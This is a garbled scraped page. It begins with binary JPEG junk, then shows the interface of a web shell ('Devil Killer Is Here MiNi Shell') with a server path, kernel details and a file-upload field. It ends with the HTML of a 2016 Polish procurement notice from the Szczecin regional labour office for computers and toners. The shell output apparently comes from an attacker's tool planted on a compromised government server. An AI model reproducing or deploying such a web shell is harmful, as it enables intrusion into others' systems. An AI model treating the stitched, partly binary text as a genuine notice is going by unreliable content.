JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161116/344345-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='nie dotyczy' target='_blank'>nie dotyczy</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 344345 - 2016
              z dnia 2016-11-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szczecin: Dostawa komputerów wraz z oprogramowaniem, tonerów do drukarek oraz sprzętu komputerowego <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br /> Dot. Części I, II i V: Wydatek współfinansowany ze środków Pomocy Technicznej Programu Operacyjnego Wiedza Edukacja Rozwój, oraz Pomocy Technicznej Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /> nie dotyczy</div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> nie dotyczy<br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b>nie dotyczy<br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wojewódzki Urząd Pracy w Szczecinie, krajowy numer identyfikacyjny
              81014446200000, ul.
              ul. Mickiewicza 
              41,
              70383  
              Szczecin, woj.
              zachodniopomorskie, państwo
              Polska, tel.
              914 256 100, e-mail
              , faks
              914 256 103.
              <br />
              Adres strony internetowej (URL): www.wup.pl<br />
                Adres profilu nabywcy:

                nie dotyczy<br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                nie dotyczy</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie dotyczy</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />nie dotyczy</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />nie dotyczy</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br />nie dotyczy</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zamawiajcy wymaga złożenia oferty w formie pisemnej<br />
                Adres:
                <br />Wojewódzki Urząd Pracy w Szczecinie, ul. A. Mickiewicza 41, 70-383 Szcecin, pok. 006 (Kancelaria Urzędu )</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa komputerów wraz z oprogramowaniem, tonerów do drukarek oraz sprzętu komputerowego <br /><b>Numer referencyjny: </b>WUP.VIIIA.322.283.MBi.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zamawiający określił szczegóły w załącznikach do niniejszego ogłoszenia<br /><br /><b>II.5) Główny kod CPV: </b>30200000-1<br /><b> Dodatkowe kody CPV:</b>30125110-5,
                30236000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b>Wymagany termin realizacji przedmiotu zamówienia: do 21 dni kalendarzowych od dania zawarcia umowy dla Części I i II, do 11 dni kalendarzowych dla Części III, IV i V.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                nie dotyczy<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                nie dotyczy</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">- Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp; lub wskazać dostępność przedmiotowych dokumentów w formie elektronicznej pod określonym adresem internetowym ogólnodostępnych i bezpłatnych baz danych, 
z których Zamawiający w formie elektronicznej samodzielnie pobierze wskazane przez Wykonawcę dokumenty.
- Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w pkt 4 ppkt 1), składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, nie otwarto jego likwidacji ani nie ogłoszono upadłości lub wskazać dostępność przedmiotowych dokumentów w formie elektronicznej pod określonym adresem internetowym ogólnodostępnych i bezpłatnych baz danych, z których Zamawiający w formie elektronicznej samodzielnie pobierze wskazane przez Wykonawcę dokumenty. Zamawiający wymaga, aby w sytuacji, gdy przedmiotowe dokumenty  będą dostępne pod wskazanym przez Wykonawcę adresem internetowym wyłączenie w języku obcym (innym niż język polski), Zamawiający żąda ich złożenia w formie pisemnej wraz tłumaczeniem na język polski.
- Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 4 ppkt 1), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />nie dotyczy<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />nie dotyczy</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">
UWAGA!!!!!
Wykonawca nie składa Formularza nr 7 do SIWZ, na etapie składania ofert. 

UWAGA!!!!
Wykonawca, w terminie 3 dni, od dnia zamieszczenia na stronie internetowej Zamawiającego,
tj. https://www.wup.pl/pl/urzad/zamowienia/zamowienia-publiczne/ informacji z otwarcia ofert, 
o której mowa art. 86 ust. 5 ustawy Pzp, Wykonawca zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp, zgodnie ze wzorem stanowiącym Formularz nr 7 do niniejszej SIWZ. 

W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b>nie dotyczy<br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              nie dotyczy<br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              nie dotyczy<br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              nie dotyczy<br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              nie dotyczy<br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br />nie dotyczy</div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />nie dotyczy<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br />nie dotyczy<br />
              Informacje dodatkowe
              <br />nie dotyczy<br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />nie dotyczy<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br />nie dotyczy<br />
              Wstępny harmonogram postępowania:
              <br />nie dotyczy<br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br />nie dotyczy<br /><br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />nie dotyczy<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br />nie dotyczy<br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px">nie dotyczy</div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">
nie dotyczy</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px">nie dotyczy</div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Wprowadzane zmiany mogą dotyczyć: Zamawiający dopuszcza możliwość zmiany modelu zaoferowanego sprzętu dla Części I - V, w przypadku braku dostępności zaoferowanego modelu/ ów, potwierdzone oświadczeniem producenta. Zaoferowany nowy model  sprzętu nie może być o parametrach gorszych niż wskazany w ofercie cenowej Wykonawcy oraz zgodny z opisem przedmiotu zamówienia, oraz Wykonawca musi uzyskać nie mniejszą ilość punktów jaką otrzymał na etapie oceny ofert.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />nie dotyczy<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />nie dotyczy<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 25/11/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br />nie dotyczy<br />
